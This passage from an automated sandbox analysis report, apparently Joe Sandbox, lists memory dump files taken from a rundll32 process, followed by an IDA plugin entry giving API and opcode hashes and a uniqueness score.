            • Associated: 00000005.00000002.790406091.00000000054A8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790433827.00000000054B2000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790451175.00000000054B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790477265.00000000054C1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790639723.0000000005510000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790703599.000000000552B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790718650.0000000005533000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790733362.000000000553B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.790792342.0000000005548000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791063153.0000000005575000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791096015.000000000557B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791126772.0000000005583000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791147376.000000000558B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791268451.0000000005599000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791422441.00000000055A3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791737718.00000000055DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791765988.00000000055E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791783859.00000000055EF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791811297.00000000055F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791824595.00000000055FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791883327.0000000005607000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.791913007.0000000005619000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792025797.0000000005634000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792175274.000000000566B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792223922.0000000005674000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792274323.000000000567C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792303062.0000000005686000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.792339652.000000000568C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795084564.0000000005C79000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795097642.0000000005C7A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795113937.0000000005C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795215945.0000000005CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795231936.0000000005CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.795984367.0000000005E72000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796015434.0000000005E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796134549.0000000005EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796157855.0000000005EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796197290.0000000005EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796249965.0000000005EA9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796280385.0000000005EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796318302.0000000005EAD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796397613.0000000005EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796472017.0000000005EB7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796498033.0000000005EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796524025.0000000005EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796637361.0000000005EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796654824.0000000005EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.796688770.0000000005EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798273481.0000000006065000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798303268.0000000006069000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798331309.000000000606B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798358531.000000000606D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798443617.0000000006079000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798469010.000000000607B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798505150.000000000607D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798556764.0000000006083000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798588685.0000000006087000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798629809.0000000006089000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798682947.0000000006093000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798709255.0000000006095000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.798826136.00000000060C2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799424596.0000000006191000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799439846.0000000006193000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799472608.00000000061A1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799493893.00000000061A5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799518956.00000000061A7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799534049.00000000061A9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799568889.00000000061AB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799588503.00000000061AD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799642185.00000000061BD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799657187.00000000061BF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799672052.00000000061C1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799774126.00000000061EC000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799930122.0000000006209000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799957271.000000000620B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.799986751.000000000620D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800013171.000000000620F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800053800.0000000006214000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.800079496.0000000006216000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_4780000_rundll32.jbxd
            Similarity
            • API ID: Thread$LanguagesPreferred$Language
            • String ID:
            • API String ID: 2255706666-0
            • Opcode ID: f33964d7b792fb003f5563daffcd9b43d1ae04cb3adf30bb2a91c226c8f8b47f
            • Instruction ID: e3726e91893c2aba8d51a2e55af7a9bb39f1c19b0efbd3df2011c9ea68da554b
            • Opcode Fuzzy Hash: f33964d7b792fb003f5563daffcd9b43d1ae04cb3adf30bb2a91c226c8f8b47f
            • Instruction Fuzzy Hash: 47314070E4421E9BDB60EFA8C884AAEBBB5FF48314F104169E515E7395DB74AE04CB90
            Uniqueness

            Uniqueness Score: -1.00%